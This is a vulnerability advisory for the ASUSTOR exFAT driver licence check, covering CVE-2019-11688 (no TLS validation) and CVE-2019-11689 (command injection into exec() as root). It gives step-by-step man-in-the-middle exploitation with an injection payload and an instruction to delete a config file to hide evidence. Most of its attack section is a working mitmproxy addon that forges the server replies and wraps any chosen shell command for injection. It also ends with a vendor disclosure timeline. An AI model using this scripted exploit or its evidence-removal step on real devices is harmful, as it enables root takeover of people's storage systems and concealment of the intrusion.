- ASUSTOR exFAT Driver <= 1.0.0.r20
- CVE-2019-11688 - TLS validation failure
- CVE-2019-11689 - Improper input sanitization
exFAT is a filesystem designed for external storage devices and is defined by the SD Card Association as the standard filesystem for SD cards over 32 GB. Because the underlying technology is patented by Microsoft, NAS vendors have begun selling support for the filesystem as an add-on driver.
The ASUSTOR exFAT implementation is available via App Central. Once installed, a license key must be entered, which is validated online against an ASUSTOR server.
During this online check the licensing application fails to validate the TLS connection to the ASUSTOR server (CVE-2019-11688), so the exchange can be intercepted by a man-in-the-middle. The license_code value returned by the (spoofed) server is then passed directly to exec() without sanitization (CVE-2019-11689), which yields remote code execution. The licensing application runs as root on the device, so the injected command runs as root.
- Install ASUSTOR exFAT Driver from App Central
- Intercept TLS traffic to asustornasapi.asustor.com by your preferred means (mitmproxy and DNS interception was used during POC development)
- Intercept HTTP POST to
/test/exfat/AS16xxxxxxxxxxxx
- Rewrite server response to
{"success":true}
- Intercept second HTTP POST to
/test/exfat/AS16xxxxxxxxxxxx
- Rewrite server response to
{"success":true,"registered":true,"license_code":"';touch /tmp/RCE;echo '"}
Note: The payload is passed directly to exec(), so quotes must be properly matched to avoid shell errors.
- Remove
/usr/builtin/etc/reg.conf
to eliminate any evidence of exploitation.
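The interception steps above can be scripted rather than edited by hand. The following mitmproxy addon is an added example written for this page; it is not part of the original proof of concept or any ASUSTOR code. It assumes the attacker already has the NAS's DNS or routing pointed at the proxy, that the licence-check host and path are exactly as listed above, and that the device serial after /test/exfat/ is alphanumeric (the regex is an assumption). The response-building logic is kept in plain functions so it can be exercised without mitmproxy installed; the payload wrapper reproduces the quoting trick from the second rewritten response.

```python
"""mitmproxy addon that forges the two ASUSTOR exFAT licence-check responses.

Run with:  mitmproxy -s exfat_license_rewrite.py
Added example for this advisory, not code from the original PoC or from ASUSTOR.
"""
import json
import re
from typing import Optional

LICENSE_HOST = "asustornasapi.asustor.com"
# Assumption: the serial after /test/exfat/ is alphanumeric (page shows AS16xxxxxxxxxxxx).
LICENSE_PATH = re.compile(r"^/test/exfat/AS16[0-9A-Za-z]+$")


def build_payload(cmd: str) -> str:
    """Wrap a shell command so it breaks out of the single-quoted string the
    licensing client builds around license_code before calling exec().

    The result for "touch /tmp/RCE" is exactly the value used in the PoC:
    ';touch /tmp/RCE;echo '
    The trailing "echo '" re-opens a quote so the client's own closing quote
    does not leave the shell with an unterminated string.
    """
    if "'" in cmd:
        raise ValueError("single quotes inside the command would unbalance the quoting")
    return "';" + cmd + ";echo '"


def forged_response(path: str, host: str, call_number: int, cmd: str) -> Optional[dict]:
    """Return the JSON object to substitute for the server's reply, or None to
    let the flow pass through untouched.

    call_number is 1-based per path: the first POST only needs {"success": true},
    the second must also claim the key is registered and carry the license_code
    that the client hands to exec().
    """
    if host != LICENSE_HOST or not LICENSE_PATH.match(path):
        return None
    if call_number == 1:
        return {"success": True}
    return {"success": True, "registered": True, "license_code": build_payload(cmd)}


# mitmproxy glue; guarded so the pure functions above import without mitmproxy.
try:
    from mitmproxy import http
except ImportError:  # pragma: no cover
    http = None


class ExfatLicenseRewrite:
    def __init__(self, cmd: str = "touch /tmp/RCE"):
        self.cmd = cmd
        self.calls = {}  # path -> number of licence POSTs seen so far

    def response(self, flow):
        req = flow.request
        if req.method != "POST":
            return
        n = self.calls.get(req.path, 0) + 1
        body = forged_response(req.path, req.host, n, self.cmd)
        if body is None:
            return
        self.calls[req.path] = n
        # Replace the real server's reply wholesale; the client never checks
        # the TLS certificate, so it trusts this as ASUSTOR's answer.
        flow.response = http.Response.make(
            200, json.dumps(body).encode(), {"Content-Type": "application/json"}
        )


addons = [ExfatLicenseRewrite()]
```

The two-call state is keyed on the request path so a retry of the first POST (for example after a transient error on the NAS side) still receives the plain success reply rather than the registration reply out of order. Commands containing a single quote are rejected up front, since they would reintroduce exactly the unbalanced-quote shell error the note above warns about.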
- 04/27/2019 - Emailed [email protected], received email bounce
- 04/28/2019 - General support provided an internal contact for security issues
- 04/29/2019 - Details sent to internal contact
- 05/02/2019 - ASUSTOR confirms vulnerability and fix, requested disclosure timeline